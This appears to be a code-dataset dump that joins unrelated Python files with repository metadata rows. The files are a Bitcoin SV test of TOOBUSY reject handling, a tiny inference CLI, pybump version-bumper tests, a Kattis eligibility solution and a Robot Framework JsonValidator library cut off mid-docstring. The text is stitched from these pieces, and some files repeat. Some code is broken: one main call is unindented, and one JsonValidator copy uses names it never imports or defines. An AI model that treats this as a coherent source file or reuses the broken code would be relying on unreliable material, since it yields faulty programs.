# Node A sends HEADERS message to bitcoind. Bitcoind sends GetData to node A.
# Node A sends REJECT_TOOBUSY message. Bitcoind waits and asks again after 5 seconds.
if __name__ == '__main__':
TooBusyRejectMsgTest().main() | 38.765957 | 141 | 0.652305 | #!/usr/bin/env python3
# Copyright (c) 2019 The Bitcoin SV developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import p2p_port, disconnect_nodes
from test_framework.blocktools import create_block, create_coinbase, assert_equal
import datetime
# This test checks TOOBUSY reject message and behaviour that it triggers.
# Scenario 1:
# 2 nodes (A and B) send HEADERS message to bitcoind. Bitcoind sends GetData to node A.
# Node A then sends REJECT_TOOBUSY message. After that, node B should be asked for the same block (GetData).
# Scenario 2:
# Node A sends HEADERS message to bitcoind. Bitcoind sends GetData to node A.
# Node A sends REJECT_TOOBUSY message. Bitcoind waits and asks again after 5 seconds.
class TooBusyRejectMsgTest(BitcoinTestFramework):
    """Functional test for the TOOBUSY reject message.

    Scenario 1: two peers announce the same header; the first peer
    answers the resulting GetData with REJECT_TOOBUSY, after which the
    node must ask the second peer for the block.
    Scenario 2: a single peer rejects with TOOBUSY; the node must retry
    the same peer after waiting more than 5 seconds.
    """
    def set_test_params(self):
        self.num_nodes = 1
        self.num_peers = 2
        # 0x44 is the TOOBUSY reject code.
        self.REJECT_TOOBUSY = int('0x44', 16)
    def prepareBlock(self):
        # Builds and solves a height-1 block on top of the current tip.
        height = 1
        tip = int("0x" + self.nodes[0].getbestblockhash(), 0)
        block_time = int(time.time()) + 1
        block = create_block(tip, create_coinbase(height), block_time)
        block.solve()
        return block
    def run_test(self):
        self.stop_node(0)
        # askedFor counts GetData requests per connection; rejectSent
        # makes sure only the first GetData is answered with a reject.
        askedFor = {}
        rejectSent = False
        def on_getdata(conn, message):
            if (conn in askedFor):
                askedFor[conn] += 1
            else:
                askedFor[conn] = 1
            nonlocal rejectSent
            # First node that receives GetData should send reject.
            if not rejectSent:
                rejectSent = True
                conn.send_message(msg_reject(message=b"getdata", code=self.REJECT_TOOBUSY, reason=b"node too busy"))
        with self.run_node_with_connections("Scenario 1: sending TOOBUSY reject message with 2 nodes", 0, [], self.num_peers) as connections:
            block = self.prepareBlock()
            for connection in connections:
                connection.cb.on_getdata = on_getdata
                headers_message = msg_headers()
                headers_message.headers = [CBlockHeader(block)]
                connection.cb.send_message(headers_message)
                connection.cb.wait_for_getdata(block.sha256)
                connection.cb.sync_with_ping()
            # Each of the two peers must have been asked exactly once.
            for key, value in askedFor.items():
                assert_equal(value, 1)
            assert_equal(len(askedFor), 2)
        # Reset the shared closure state for the single-peer scenario.
        self.num_peers = 1
        askedFor = {}
        rejectSent = False
        with self.run_node_with_connections("Scenario 2: sending TOOBUSY reject message with 1 node", 0, [], self.num_peers) as connections:
            block = self.prepareBlock()
            connection = connections[0]
            connection.cb.on_getdata = on_getdata
            headers_message = msg_headers()
            headers_message.headers = [CBlockHeader(block)]
            begin_test = datetime.datetime.now()
            connection.cb.send_message(headers_message)
            connection.cb.wait_for_getdata(block.sha256)
            connection.cb.last_message["getdata"] = []
            connection.cb.wait_for_getdata(block.sha256)
            end_test = datetime.datetime.now()
            # The retry must come only after the 5 second back-off.
            assert(end_test - begin_test > datetime.timedelta(seconds = 5))
            assert_equal(next(iter(askedFor.values())), 2)
            assert_equal(len(askedFor), 1)
if __name__ == '__main__':
TooBusyRejectMsgTest().main() | 2,513 | 28 | 103 |
d6ba8bf6f755c2003be639a8935050214e58c73b | 231 | py | Python | src/patched_flannel/classification/classification_inference.py | mannbiher/DeepLearningForHealthCareProject | 4692031591bd88c489c9b905e7c340ac76a5366b | [
"MIT"
] | null | null | null | src/patched_flannel/classification/classification_inference.py | mannbiher/DeepLearningForHealthCareProject | 4692031591bd88c489c9b905e7c340ac76a5366b | [
"MIT"
] | 14 | 2021-05-10T18:00:58.000Z | 2021-05-12T00:29:41.000Z | src/patched_flannel/classification/classification_inference.py | mannbiher/DeepLearningForHealthCareProject | 4692031591bd88c489c9b905e7c340ac76a5366b | [
"MIT"
] | null | null | null | import inference
import argparse
if __name__ == '__main__':
    # Parse the cross-validation split identifier from the command line
    # and hand it to the project's inference entry point.
    cli = argparse.ArgumentParser()
    cli.add_argument("cv", help = "Cross Validation")
    inference.main(cli.parse_args().cv)
| 23.1 | 57 | 0.679654 | import inference
import argparse
if __name__ == '__main__':
    # Command line: one positional argument naming the cross-validation
    # split to run inference for.
    parser = argparse.ArgumentParser()
    parser.add_argument("cv", help = "Cross Validation")
    args = parser.parse_args()
    cv = args.cv
    # Delegate all actual work to the project's inference module.
    inference.main(cv)
| 0 | 0 | 0 |
28ba03932133ca7783d3e79b01364e01f4e4daff | 8,272 | py | Python | pybump/pybump_unittest.py | nvanheuverzwijn/PyBump | 08151e86c0b3b9cffcac6b324efd3a8772a34358 | [
"Apache-2.0"
] | null | null | null | pybump/pybump_unittest.py | nvanheuverzwijn/PyBump | 08151e86c0b3b9cffcac6b324efd3a8772a34358 | [
"Apache-2.0"
] | null | null | null | pybump/pybump_unittest.py | nvanheuverzwijn/PyBump | 08151e86c0b3b9cffcac6b324efd3a8772a34358 | [
"Apache-2.0"
] | null | null | null | import unittest
from subprocess import run, PIPE
from pybump.pybump import *
valid_helm_chart = {'apiVersion': 'v1',
'appVersion': '1.0',
'description': 'A Helm chart for Kubernetes',
'name': 'test',
'version': '0.1.0'}
invalid_helm_chart = {'apiVersion': 'v1',
'notAppVersionKeyHere': '1.0',
'description': 'A Helm chart for Kubernetes',
'name': 'test',
'version': '0.1.0'}
empty_helm_chart = {}
valid_setup_py = """
setuptools.setup(
name="pybump",
version="0.1.3",
author="Arie Lev",
author_email="levinsonarie@gmail.com",
description="Python version bumper",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/ArieLevs/PyBump",
license='Apache License 2.0',
packages=setuptools.find_packages(),
)
"""
# This setup.py content is missing 'version' key
invalid_setup_py_1 = """
setuptools.setup(
name="pybump",
invalid_version_string="0.1.3",
author="Arie Lev",
author_email="levinsonarie@gmail.com",
description="Python version bumper",
)
"""
# This setup.py content 'version' key declared 3 times
invalid_setup_py_2 = """
setuptools.setup(
name="pybump",
version="0.1.3",
version="0.1.2",
__version__="12356"
author="Arie Lev",
author_email="levinsonarie@gmail.com",
description="Python version bumper",
)
"""
valid_version_file_1 = """0.12.4"""
valid_version_file_2 = """
1.5.0
"""
invalid_version_file_1 = """
this is some text in addition to version
1.5.0
nothing except semantic version should be in this file
"""
invalid_version_file_2 = """
version=1.5.0
"""
if __name__ == '__main__':
unittest.main()
| 38.835681 | 99 | 0.5978 | import unittest
from subprocess import run, PIPE
from pybump.pybump import *
valid_helm_chart = {'apiVersion': 'v1',
'appVersion': '1.0',
'description': 'A Helm chart for Kubernetes',
'name': 'test',
'version': '0.1.0'}
invalid_helm_chart = {'apiVersion': 'v1',
'notAppVersionKeyHere': '1.0',
'description': 'A Helm chart for Kubernetes',
'name': 'test',
'version': '0.1.0'}
empty_helm_chart = {}
valid_setup_py = """
setuptools.setup(
name="pybump",
version="0.1.3",
author="Arie Lev",
author_email="levinsonarie@gmail.com",
description="Python version bumper",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/ArieLevs/PyBump",
license='Apache License 2.0',
packages=setuptools.find_packages(),
)
"""
# This setup.py content is missing 'version' key
invalid_setup_py_1 = """
setuptools.setup(
name="pybump",
invalid_version_string="0.1.3",
author="Arie Lev",
author_email="levinsonarie@gmail.com",
description="Python version bumper",
)
"""
# This setup.py content 'version' key declared 3 times
invalid_setup_py_2 = """
setuptools.setup(
name="pybump",
version="0.1.3",
version="0.1.2",
__version__="12356"
author="Arie Lev",
author_email="levinsonarie@gmail.com",
description="Python version bumper",
)
"""
valid_version_file_1 = """0.12.4"""
valid_version_file_2 = """
1.5.0
"""
invalid_version_file_1 = """
this is some text in addition to version
1.5.0
nothing except semantic version should be in this file
"""
invalid_version_file_2 = """
version=1.5.0
"""
def get_version(file):
    """Run ``pybump get`` on *file* and return the CompletedProcess (output captured)."""
    command = ["python", "pybump/pybump.py", "get", "--file", file]
    return run(command, stdout=PIPE, stderr=PIPE)
def set_version(file, version):
    """Run ``pybump set`` to write *version* into *file*; returns the CompletedProcess."""
    command = ["python", "pybump/pybump.py", "set", "--file", file, "--set-version", version]
    return run(command, stdout=PIPE, stderr=PIPE)
class PyBumpTest(unittest.TestCase):
    """Unit and end-to-end tests for the pybump version bumper."""

    def setUp(self):
        # No shared fixtures needed; the module-level data constants suffice.
        pass

    def test_is_semantic_string(self):
        """is_semantic_string parses 'X.Y.Z' into [X, Y, Z] and is falsy otherwise."""
        self.assertEqual(is_semantic_string('1.2.3'), [1, 2, 3])
        self.assertNotEqual(is_semantic_string('1.2.3'), [1, 2, 4])
        self.assertTrue(is_semantic_string('0.0.0'))
        self.assertTrue(is_semantic_string('13.0.75'))
        self.assertTrue(is_semantic_string('0.5.447'))
        self.assertTrue(is_semantic_string('1.02.3'))
        self.assertTrue(is_semantic_string('000.000.111'))
        # Anything that is not three dot-separated non-negative integers fails.
        self.assertFalse(is_semantic_string('1.2.c'))
        self.assertFalse(is_semantic_string('1.2.-3'))
        self.assertFalse(is_semantic_string('1.2.3-dev'))
        self.assertFalse(is_semantic_string('1.9'))
        self.assertFalse(is_semantic_string('text'))
        self.assertFalse(is_semantic_string(4))
        self.assertFalse(is_semantic_string(True))
        self.assertFalse(is_semantic_string(None))

    def test_is_valid_helm_chart(self):
        """A chart dict missing the appVersion key (or empty) is invalid."""
        self.assertTrue(is_valid_helm_chart(valid_helm_chart))
        self.assertFalse(is_valid_helm_chart(invalid_helm_chart))
        self.assertFalse(is_valid_helm_chart(empty_helm_chart))

    def test_bump_version(self):
        """bump_version increments the requested level and zeroes lower levels."""
        self.assertEqual(bump_version([9, 0, 7], 'major'), [10, 0, 0])
        self.assertEqual(bump_version([1, 2, 3], 'major'), [2, 0, 0])
        self.assertEqual(bump_version([1, 2, 3], 'minor'), [1, 3, 0])
        self.assertEqual(bump_version([1, 2, 3], 'patch'), [1, 2, 4])
        self.assertEqual(bump_version([0, 0, 9], 'patch'), [0, 0, 10])
        # Invalid version input or an unknown bump level raises ValueError.
        self.assertRaises(ValueError, bump_version, None, 'patch')
        self.assertRaises(ValueError, bump_version, [1, 2, 3], 'not_patch')

    def test_get_setup_py_version(self):
        """A setup.py with exactly one 'version' key parses; zero or many raise."""
        self.assertEqual(get_setup_py_version(valid_setup_py), '0.1.3')
        with self.assertRaises(RuntimeError):
            get_setup_py_version(invalid_setup_py_1)
        with self.assertRaises(RuntimeError):
            get_setup_py_version(invalid_setup_py_2)

    def test_is_valid_version_file(self):
        """A version file must contain nothing but one semantic version string."""
        self.assertTrue(is_semantic_string(valid_version_file_1))
        self.assertTrue(is_semantic_string(valid_version_file_2))
        self.assertFalse(is_semantic_string(invalid_version_file_1))
        self.assertFalse(is_semantic_string(invalid_version_file_2))
        self.assertEqual(is_semantic_string(valid_version_file_1), [0, 12, 4])

    @staticmethod
    def test_bump_patch():
        """End-to-end: 'bump --level patch' takes the chart from 0.1.0 to 0.1.1."""
        set_version("pybump/test_valid_chart.yaml", "0.1.0")
        completed_process_object = run(["python", "pybump/pybump.py", "bump",
                                        "--level", "patch",
                                        "--file", "pybump/test_valid_chart.yaml"],
                                       stdout=PIPE,
                                       stderr=PIPE)
        if completed_process_object.returncode != 0:
            raise Exception(completed_process_object.stderr.decode('utf-8'))
        # Read the version back and verify the patch component moved.
        completed_process_object = get_version("pybump/test_valid_chart.yaml")
        if completed_process_object.returncode != 0:
            raise Exception(completed_process_object.stderr.decode('utf-8'))
        stdout = completed_process_object.stdout.decode('utf-8').strip()
        if stdout != "0.1.1":
            raise Exception("test_bump_patch failed, return version should be 0.1.1 got " + stdout)

    @staticmethod
    def test_bump_minor():
        """End-to-end: 'bump --level minor' takes setup.py from 2.1.5 to 2.2.0."""
        set_version("pybump/test_valid_setup.py", "2.1.5")
        completed_process_object = run(["python", "pybump/pybump.py", "bump",
                                        "--level", "minor",
                                        "--file", "pybump/test_valid_setup.py"],
                                       stdout=PIPE,
                                       stderr=PIPE)
        if completed_process_object.returncode != 0:
            raise Exception(completed_process_object.stderr.decode('utf-8'))
        completed_process_object = get_version("pybump/test_valid_setup.py")
        if completed_process_object.returncode != 0:
            raise Exception(completed_process_object.stderr.decode('utf-8'))
        stdout = completed_process_object.stdout.decode('utf-8').strip()
        if stdout != "2.2.0":
            raise Exception("test_bump_minor failed, return version should be 2.2.0 got " + stdout)

    @staticmethod
    def test_bump_major():
        """End-to-end: 'bump --level major' takes the chart from 0.5.9 to 1.0.0."""
        set_version("pybump/test_valid_chart.yaml", "0.5.9")
        completed_process_object = run(["python", "pybump/pybump.py", "bump",
                                        "--level", "major",
                                        "--file", "pybump/test_valid_chart.yaml"],
                                       stdout=PIPE,
                                       stderr=PIPE)
        if completed_process_object.returncode != 0:
            raise Exception(completed_process_object.stderr.decode('utf-8'))
        completed_process_object = get_version("pybump/test_valid_chart.yaml")
        if completed_process_object.returncode != 0:
            raise Exception(completed_process_object.stderr.decode('utf-8'))
        stdout = completed_process_object.stdout.decode('utf-8').strip()
        if stdout != "1.0.0":
            raise Exception("test_bump_major failed, return version should be 1.0.0 got " + stdout)

    @staticmethod
    def test_invalid_bump_major():
        """Bumping an invalid chart file must make pybump exit non-zero."""
        set_version("pybump/test_invalid_chart.yaml", "3.5.5")
        completed_process_object = run(["python", "pybump/pybump.py", "bump",
                                        "--level", "major",
                                        "--file", "pybump/test_invalid_chart.yaml"],
                                       stdout=PIPE,
                                       stderr=PIPE)
        if completed_process_object.returncode != 0:
            # A non-zero exit is the expected outcome here.
            pass
        else:
            raise Exception("test_invalid_bump_major failed, test should of fail, but passed")
if __name__ == '__main__':
unittest.main()
| 5,842 | 357 | 69 |
cd5f61d3ad1de80372cee303a7f77b5d54f1c0e1 | 380 | py | Python | Python/eligibility/eligibility.py | rvrheenen/OpenKattis | 7fd59fcb54e86cdf10f56c580c218c62e584f391 | [
"MIT"
] | 12 | 2016-10-03T20:43:43.000Z | 2021-06-12T17:18:42.000Z | Python/eligibility/eligibility.py | rvrheenen/OpenKattis | 7fd59fcb54e86cdf10f56c580c218c62e584f391 | [
"MIT"
] | null | null | null | Python/eligibility/eligibility.py | rvrheenen/OpenKattis | 7fd59fcb54e86cdf10f56c580c218c62e584f391 | [
"MIT"
] | 10 | 2017-11-14T19:56:37.000Z | 2021-02-02T07:39:57.000Z | N = input()
for i in range(int(N)):
    # Each input line: name, first date, second date, completed course count.
    # Dates are year-first ("YYYY/..."), so element 0 of the split is the year.
    inp = input().split()
    name = inp[0]
    date1 = inp[1].split("/")
    date2 = inp[2].split("/")
    courses = int(inp[3])
    # Eligible when the first date's year is >= 2010 or the second's is >= 1991.
    if (int(date1[0]) >= 2010 or int(date2[0]) >= 1991):
        eligible = "eligible"
    elif courses > 40:
        # Neither date criterion met and more than 40 courses: ineligible.
        eligible = "ineligible"
    else:
        # Borderline case left to a coach petition.
        eligible = "coach petitions"
print(name, eligible) | 27.142857 | 56 | 0.536842 | N = input()
for i in range(int(N)):
inp = input().split()
name = inp[0]
date1 = inp[1].split("/")
date2 = inp[2].split("/")
courses = int(inp[3])
if (int(date1[0]) >= 2010 or int(date2[0]) >= 1991):
eligible = "eligible"
elif courses > 40:
eligible = "ineligible"
else:
eligible = "coach petitions"
print(name, eligible) | 0 | 0 | 0 |
c65a66dd59a2fb56808acb7bfb866b36ff272d39 | 13,714 | py | Python | library/JsonValidator.py | dmizverev/robot-framework-library | 62379bc3a46ca59fd07702416c4020330dfcb7a3 | [
"Apache-2.0"
] | 28 | 2015-06-04T01:31:34.000Z | 2021-08-02T12:16:52.000Z | library/JsonValidator.py | dmizverev/robot-framework-library | 62379bc3a46ca59fd07702416c4020330dfcb7a3 | [
"Apache-2.0"
] | 4 | 2016-03-31T11:46:15.000Z | 2017-12-20T12:24:41.000Z | library/JsonValidator.py | dmizverev/robot-framework-library | 62379bc3a46ca59fd07702416c4020330dfcb7a3 | [
"Apache-2.0"
] | 21 | 2015-02-16T15:59:04.000Z | 2020-04-24T06:03:44.000Z | # -*- coding: utf-8 -*-
import json
import jsonschema
from jsonpath_rw import parse
from jsonselect import jsonselect
class JsonValidator(object):
"""
Библиотека для проверки json.
Основана на: JSONSchema, JSONPath, JSONSelect.
== Дополнительная информация ==
- [ http://json-schema.org/ | Json Schema ]
- [ http://www.jsonschema.net/ | Jsonschema generator ]
- [ http://goessner.net/articles/JsonPath/ | JSONPath by Stefan Goessner ]
- [ http://jsonpath.curiousconcept.com/ | JSONPath Tester ]
- [ http://jsonselect.org/ | JSONSelect]
- [ http://jsonselect.curiousconcept.com/ | JSONSelect Tester]
== Зависимости ==
| jsonschema | https://pypi.python.org/pypi/jsonschema |
| jsonpath-rw | https://pypi.python.org/pypi/jsonpath-rw |
| jsonselect | https://pypi.python.org/pypi/jsonselect |
== Пример использования ==
Пример json, записанного в файле json_example.json
| { "store": {
| "book": [
| { "category": "reference",
| "author": "Nigel Rees",
| "title": "Sayings of the Century",
| "price": 8.95
| },
| { "category": "fiction",
| "author": "Evelyn Waugh",
| "title": "Sword of Honour",
| "price": 12.99
| },
| { "category": "fiction",
| "author": "Herman Melville",
| "title": "Moby Dick",
| "isbn": "0-553-21311-3",
| "price": 8.99
| },
| { "category": "fiction",
| "author": "J. R. R. Tolkien",
| "title": "The Lord of the Rings",
| "isbn": "0-395-19395-8",
| "price": 22.99
| }
| ],
| "bicycle": {
| "color": "red",
| "price": 19.95
| }
| }
| }
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Check element | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | Element should exist | ${json_example} | .author:contains("Evelyn Waugh") |
"""
ROBOT_LIBRARY_SCOPE='GLOBAL'
def _validate_json(self, checked_json, schema):
"""
Проверка json по JSONSchema
"""
try:
jsonschema.validate(checked_json, schema)
except jsonschema.ValidationError , e:
raise JsonValidatorError ('Element: %s. Error: %s. '%(e.path[0], e.message))
except jsonschema.SchemaError , e:
raise JsonValidatorError ('Json-schema error:'+e.message)
def validate_jsonschema_from_file (self, json_string, path_to_schema):
"""
Проверка json по схеме, загружаемой из файла.
*Args:*\n
_json_string_ - json-строка;\n
_path_to_schema_ - путь к файлу со схемой json;
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Simple | Validate jsonschema from file | {"foo":bar} | ${CURDIR}${/}schema.json |
"""
schema=open(path_to_schema).read()
load_input_json=self.string_to_json (json_string)
try:
load_schema=json.loads(schema)
except ValueError, e:
raise JsonValidatorError ('Error in schema: '+e.message)
self._validate_json (load_input_json, load_schema)
def validate_jsonschema (self, json_string, input_schema):
"""
Проверка json по схеме.
*Args:*\n
_json_string_ - json-строка;\n
_input_schema_ - схема в виде строки;
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Simple | ${schema}= | OperatingSystem.Get File | ${CURDIR}${/}schema_valid.json |
| | Validate jsonschema | {"foo":bar} | ${schema} |
"""
load_input_json=self.string_to_json (json_string)
try:
load_schema=json.loads(input_schema)
except ValueError, e:
raise JsonValidatorError ('Error in schema: '+e.message)
self._validate_json (load_input_json, load_schema)
def string_to_json (self, source):
"""
Десериализация строки в json структуру.
*Args:*\n
_source_ - json-строка
*Return:*\n
Json структура
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| String to json | ${json_string}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json}= | String to json | ${json_string} |
| | Log | ${json["store"]["book"][0]["price"]} |
=>\n
8.95
"""
try:
load_input_json=json.loads(source)
except ValueError, e:
raise JsonValidatorError("Could not parse '%s' as JSON: %s"%(source, e))
return load_input_json
def json_to_string (self, source):
"""
Cериализация json структуры в строку.
*Args:*\n
_source_ - json структура
*Return:*\n
Json строка
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Json to string | ${json_string}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json}= | String to json | ${json_string} |
| | ${string}= | Json to string | ${json} |
| | ${pretty_string}= | Pretty print json | ${string} |
| | Log to console | ${pretty_string} |
"""
try:
load_input_json=json.dumps(source)
except ValueError, e:
raise JsonValidatorError("Could serialize '%s' to JSON: %s"%(source, e))
return load_input_json
def get_elements (self, json_string, expr):
"""
Возвращает список элементов из _json_string_, соответствующих [http://goessner.net/articles/JsonPath/|JSONPath] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - JSONPath выражение;
*Return:*\n
Список найденных элементов. Если элементы не найдены, то возвращается ``None``
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Get json elements | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json_elements}= | Get elements | ${json_example} | $.store.book[*].author |
=>\n
| [u'Nigel Rees', u'Evelyn Waugh', u'Herman Melville', u'J. R. R. Tolkien']
"""
load_input_json=self.string_to_json (json_string)
# парсинг jsonpath
jsonpath_expr=parse(expr)
# список возвращаемых элементов
value_list=[]
for match in jsonpath_expr.find(load_input_json):
value_list.append(match.value)
if not value_list:
return None
else:
return value_list
def select_elements (self, json_string, expr):
"""
Возвращает список элементов из _json_string_, соответствующих [ http://jsonselect.org/ | JSONSelect] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - JSONSelect выражение;
*Return:*\n
Список найденных элементов. Если элементы не найдены, то ``None``
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Select json elements | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json_elements}= | Select elements | ${json_example} | .author:contains("Evelyn Waugh")~.price |
=>\n
| 12.99
"""
load_input_json=self.string_to_json (json_string)
# парсинг jsonselect
jsonselect.Parser(load_input_json)
values=jsonselect.select(expr, load_input_json)
return values
def element_should_exist (self, json_string, expr):
"""
Проверка существования одного или более элементов, соответствующих [ http://jsonselect.org/ | JSONSelect] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - jsonpath выражение;\n
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Check element | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | Element should exist | ${json_example} | $..book[?(@.author=='Herman Melville')] |
"""
value=self.select_elements (json_string, expr)
if value is None:
raise JsonValidatorError ('Elements %s does not exist'%expr)
def element_should_not_exist (self, json_string, expr):
"""
Проверка отсутствия одного или более элементов, соответствующих [ http://jsonselect.org/ | JSONSelect] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - jsonpath выражение;\n
*Raises:*\n
JsonValidatorError
"""
value=self.select_elements (json_string, expr)
if value is not None:
raise JsonValidatorError ('Elements %s exist but should not'%expr)
def update_json(self, json_string, expr, value, index=0):
"""
Замена значения в json-строке.
*Args:*\n
_json_string_ - json-строка dict;\n
_expr_ - JSONPath выражение для определения заменяемого значения;\n
_value_ - значение, на которое будет произведена замена;\n
_index_ - устанавливает индекс для выбора элемента внутри списка совпадений, по-умолчанию равен 0;\n
*Return:*\n
Изменённый json в виде словаря.
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Update element | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json_update}= | Update_json | ${json_example} | $..color | changed |
"""
load_input_json=self.string_to_json (json_string)
matches = self._json_path_search(load_input_json, expr)
datum_object = matches[int(index)]
if not isinstance(datum_object, DatumInContext):
raise JsonValidatorError("Nothing found by the given json-path")
path = datum_object.path
# Изменить справочник используя полученные данные
# Если пользователь указал на список
if isinstance(path, Index):
datum_object.context.value[datum_object.path.index] = value
# Если пользователь указал на значение (string, bool, integer or complex)
elif isinstance(path, Fields):
datum_object.context.value[datum_object.path.fields[0]] = value
return load_input_json
def pretty_print_json (self, json_string):
"""
Возврещает отформатированную json-строку _json_string_.\n
Используется метод json.dumps с настройкой _indent=2, ensure_ascii=False_.
*Args:*\n
_json_string_ - json-строка.
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Check element | ${pretty_json}= | Pretty print json | {a:1,foo:[{b:2,c:3},{d:"baz",e:4}]} |
| | Log | ${pretty_json} |
=>\n
| {
| "a": 1,
| "foo": [
| {
| "c": 3,
| "b": 2
| },
| {
| "e": 4,
| "d": "baz"
| }
| ]
| }
"""
return json.dumps(self.string_to_json(json_string), indent=2, ensure_ascii=False)
| 36.089474 | 136 | 0.526032 | # -*- coding: utf-8 -*-
import json

import jsonschema
from jsonpath_rw import DatumInContext, Fields, Index, parse
from jsonselect import jsonselect
class JsonValidator(object):
"""
Библиотека для проверки json.
Основана на: JSONSchema, JSONPath, JSONSelect.
== Дополнительная информация ==
- [ http://json-schema.org/ | Json Schema ]
- [ http://www.jsonschema.net/ | Jsonschema generator ]
- [ http://goessner.net/articles/JsonPath/ | JSONPath by Stefan Goessner ]
- [ http://jsonpath.curiousconcept.com/ | JSONPath Tester ]
- [ http://jsonselect.org/ | JSONSelect]
- [ http://jsonselect.curiousconcept.com/ | JSONSelect Tester]
== Зависимости ==
| jsonschema | https://pypi.python.org/pypi/jsonschema |
| jsonpath-rw | https://pypi.python.org/pypi/jsonpath-rw |
| jsonselect | https://pypi.python.org/pypi/jsonselect |
== Пример использования ==
Пример json, записанного в файле json_example.json
| { "store": {
| "book": [
| { "category": "reference",
| "author": "Nigel Rees",
| "title": "Sayings of the Century",
| "price": 8.95
| },
| { "category": "fiction",
| "author": "Evelyn Waugh",
| "title": "Sword of Honour",
| "price": 12.99
| },
| { "category": "fiction",
| "author": "Herman Melville",
| "title": "Moby Dick",
| "isbn": "0-553-21311-3",
| "price": 8.99
| },
| { "category": "fiction",
| "author": "J. R. R. Tolkien",
| "title": "The Lord of the Rings",
| "isbn": "0-395-19395-8",
| "price": 22.99
| }
| ],
| "bicycle": {
| "color": "red",
| "price": 19.95
| }
| }
| }
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Check element | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | Element should exist | ${json_example} | .author:contains("Evelyn Waugh") |
"""
ROBOT_LIBRARY_SCOPE='GLOBAL'
def _validate_json(self, checked_json, schema):
"""
Проверка json по JSONSchema
"""
try:
jsonschema.validate(checked_json, schema)
except jsonschema.ValidationError , e:
raise JsonValidatorError ('Element: %s. Error: %s. '%(e.path[0], e.message))
except jsonschema.SchemaError , e:
raise JsonValidatorError ('Json-schema error:'+e.message)
def validate_jsonschema_from_file (self, json_string, path_to_schema):
"""
Проверка json по схеме, загружаемой из файла.
*Args:*\n
_json_string_ - json-строка;\n
_path_to_schema_ - путь к файлу со схемой json;
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Simple | Validate jsonschema from file | {"foo":bar} | ${CURDIR}${/}schema.json |
"""
schema=open(path_to_schema).read()
load_input_json=self.string_to_json (json_string)
try:
load_schema=json.loads(schema)
except ValueError, e:
raise JsonValidatorError ('Error in schema: '+e.message)
self._validate_json (load_input_json, load_schema)
def validate_jsonschema (self, json_string, input_schema):
"""
Проверка json по схеме.
*Args:*\n
_json_string_ - json-строка;\n
_input_schema_ - схема в виде строки;
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Simple | ${schema}= | OperatingSystem.Get File | ${CURDIR}${/}schema_valid.json |
| | Validate jsonschema | {"foo":bar} | ${schema} |
"""
load_input_json=self.string_to_json (json_string)
try:
load_schema=json.loads(input_schema)
except ValueError, e:
raise JsonValidatorError ('Error in schema: '+e.message)
self._validate_json (load_input_json, load_schema)
    def string_to_json (self, source):
        """
        Deserialize a string into a json structure.

        *Args:*\n
        _source_ - json string

        *Return:*\n
        Json structure

        *Raises:*\n
        JsonValidatorError - when the string is not valid JSON

        *Example:*\n
        | *Settings* | *Value* |
        | Library    | JsonValidator |
        | Library    | OperatingSystem |
        | *Test Cases* | *Action* | *Argument* | *Argument* |
        | String to json | ${json_string}=  | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
        |                | ${json}= | String to json | ${json_string} |
        |                | Log | ${json["store"]["book"][0]["price"]} |
        =>\n
        8.95
        """
        try:
            load_input_json=json.loads(source)
        # Wrap the parse failure in the library's own exception type.
        except ValueError, e:
            raise JsonValidatorError("Could not parse '%s' as JSON: %s"%(source, e))
        return load_input_json
def json_to_string (self, source):
"""
Cериализация json структуры в строку.
*Args:*\n
